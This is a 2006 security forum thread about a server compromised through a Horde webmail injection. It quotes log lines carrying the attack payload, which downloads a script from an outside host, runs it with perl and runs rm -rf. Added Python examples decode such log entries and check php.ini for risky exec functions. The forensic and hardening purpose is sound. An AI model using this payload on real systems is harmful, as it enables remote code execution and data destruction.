

Security Update: Horde Exploit

Discussion in 'Security' started by stugster, Sep 8, 2006.

  1. stugster

    Hey guys, just letting you know that our server was compromised and completely messed up last night by a Horde exploit.

    Here's an output from our technician:

    The hacker got into the server using an apache exploit:
    ------------------------------------------------------------------------------------------------
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:56 -0500] " GET /horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 404 -

    -------------------------------------------------------------------------------------------------

    We're going to have to migrate to another box - rather than just messing about with the files.

    Just a heads up for you's!
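The technician's egrep above is a good first sweep, but every match still has to be decoded before you know what the attacker actually tried to run. The script below is an added example (not part of stugster's post, the technician's output, or anything from cPanel): it applies the same pattern to Apache access_log lines, URL-decodes each flagged request, folds the `".chr(47)."` concatenation back into a literal shell command, and pulls out the download URLs. The embedded log lines are constructed for this example and modelled on the ones in the post (attacker IP 200.32.97.251, the Horde help paths, the host elsotanodg.com and the 302/404 statuses come from the post; the three benign lines are made up), and the needs_triage heuristic is the example's own.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample of /usr/local/apache/logs/access_log (common-log-format request lines).
# Lines 1-2 reproduce the injected request from the thread; lines 3-5 are made-up benign traffic,
# the last of which happens to contain "perl%20" and so trips the crude egrep pattern.
SAMPLE_LOG = """\
200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] "GET /horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;%20cd%20%22.chr(47).%22tmp;%20wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h;%20fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h;%20curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h;%20perl%20h;%20rm%20-rf%20*%22); HTTP/1.1" 302 310
200.32.97.251 - - [28/Apr/2006:06:27:56 -0500] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;%20cd%20%22.chr(47).%22tmp;%20wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h;%20perl%20h%22); HTTP/1.1" 404 -
10.0.0.5 - - [28/Apr/2006:06:30:01 -0500] "GET /horde/login.php HTTP/1.1" 200 4123
10.0.0.7 - - [28/Apr/2006:06:31:15 -0500] "GET /docs/curl/manual.html HTTP/1.1" 200 8812
10.0.0.9 - - [28/Apr/2006:06:32:40 -0500] "GET /search.php?q=perl%20modules HTTP/1.1" 200 2210
"""

# The exact pattern the technician ran with egrep -i, compiled case-insensitively.
INJECTION_RE = re.compile(r'(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20', re.I)

# Apache common/combined log prefix: ip ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>.*?) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# PHP string concatenation the attacker used to avoid literal slashes: ".chr(47)."
CHR_CONCAT_RE = re.compile(r'"\.chr\((\d+)\)\."')
# Argument handed to passthru("..."); greedy so it runs to the closing ") of the call.
PASSTHRU_RE = re.compile(r'passthru\("(.*)"\)', re.S)
URL_RE = re.compile(r'https?://[^\s;"\']+')


@dataclass
class Hit:
    ip: str
    time: str
    status: int
    path: str
    command: str   # shell command handed to passthru(), '' if none could be recovered
    urls: list     # download URLs found in that command, de-duplicated, in order


def reconstruct_command(decoded_path: str) -> str:
    """Recover the shell command from a URL-decoded request: find the passthru() argument
    and replace every ".chr(NN)." concatenation with the character it produces."""
    m = PASSTHRU_RE.search(decoded_path)
    if not m:
        return ''
    return CHR_CONCAT_RE.sub(lambda c: chr(int(c.group(1))), m.group(1))


def scan_log(text: str) -> list:
    """Return a Hit for every log line the egrep pattern would have flagged."""
    hits = []
    for line in text.splitlines():
        if not INJECTION_RE.search(line):
            continue
        m = LOG_RE.match(line)
        if not m:
            continue   # not a request line we can parse; keep going rather than crash mid-log
        command = reconstruct_command(unquote(m['path']))
        urls = list(dict.fromkeys(URL_RE.findall(command)))
        hits.append(Hit(m['ip'], m['time'], int(m['status']), m['path'], command, urls))
    return hits


def needs_triage(hit: Hit) -> bool:
    """Heuristic (this example's own): a recovered command whose request did not 404 reached
    a PHP handler, so treat the box as compromised until proven otherwise."""
    return bool(hit.command) and hit.status != 404


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit.ip} {hit.time} status={hit.status} triage={needs_triage(hit)}")
        print(f"  command: {hit.command or '(none recovered)'}")
        print(f"  urls:    {hit.urls}")
```

Two things this shows that the raw egrep does not: the 404 request never reached a Horde help handler, while the 302 on the same payload means PHP processed it, which is exactly the call made in the post; and the pattern alone also flags an innocent search query containing `perl%20`, so decode and reconstruct before acting on a match.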
     
  2. netlook

    I think passthru() and other "dangerous" functions in PHP should be disabled by default on all webhosting boxes!
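A quick way to check whether a box already does what netlook suggests. This is an added example, not code from the thread or from cPanel: it parses the disable_functions directive out of a php.ini and reports which command-execution functions are still enabled. Blocking passthru() alone would not have helped here, since the same injection could just as well have called system() or shell_exec(), so the check covers the whole family. The two php.ini fragments are constructed, and the list of functions to block is this example's own choice, not an exhaustive one.

```python
import re

# Command-execution functions a shared PHP host should block (this example's own list).
RISKY_FUNCTIONS = ("exec", "passthru", "shell_exec", "system", "proc_open", "popen", "pcntl_exec")

# Constructed php.ini fragments: the stock setting (nothing disabled) and a hardened one.
WEAK_INI = """\
; php.ini as shipped: the directive is present but empty
disable_functions =
"""

HARDENED_INI = """\
;disable_functions =
disable_functions = "exec, passthru, shell_exec, system, proc_open, popen, pcntl_exec" ; block shell access
"""

DIRECTIVE_RE = re.compile(r'^\s*disable_functions\s*=\s*(.*?)\s*$')


def parse_disable_functions(ini_text: str) -> set:
    """Return the function names from the last uncommented disable_functions line.

    PHP lets a later directive override an earlier one, so the last occurrence wins.
    Names are lower-cased because PHP function names are case-insensitive."""
    names = set()
    for line in ini_text.splitlines():
        if line.lstrip().startswith(';'):
            continue                      # ';' starts a comment in php.ini
        m = DIRECTIVE_RE.match(line)
        if not m:
            continue
        value = m.group(1).split(';', 1)[0].strip().strip('"\'')   # drop inline comment and quotes
        names = {n.strip().lower() for n in value.split(',') if n.strip()}
    return names


def missing_risky_functions(ini_text: str) -> list:
    """List the RISKY_FUNCTIONS the ini leaves enabled, in RISKY_FUNCTIONS order."""
    disabled = parse_disable_functions(ini_text)
    return [f for f in RISKY_FUNCTIONS if f not in disabled]


if __name__ == "__main__":
    for label, ini in (("stock", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{label}: still enabled -> {missing_risky_functions(ini) or 'none'}")
```

Run it against the ini that is actually in effect for the web server (what `php -i` or phpinfo() reports) rather than just the master file, since per-directory php.ini files may apply depending on the PHP handler. disable_functions can only be set at the system ini level, so once it is in place a script cannot undo it with ini_set() and a customer cannot undo it from .htaccess.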
     
  3. randomuser

    Was it a Horde vulnerability or an Apache vulnerability? You state both. Your logs show Horde. Which would mean that Horde is accessible on your server remotely without first authenticating for webmail.


    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -


    The 3rd log was a 404. The first 2 logs, shown above, are from April. The Horde exploit in the logs is old now, having been out for a few months and already patched.
     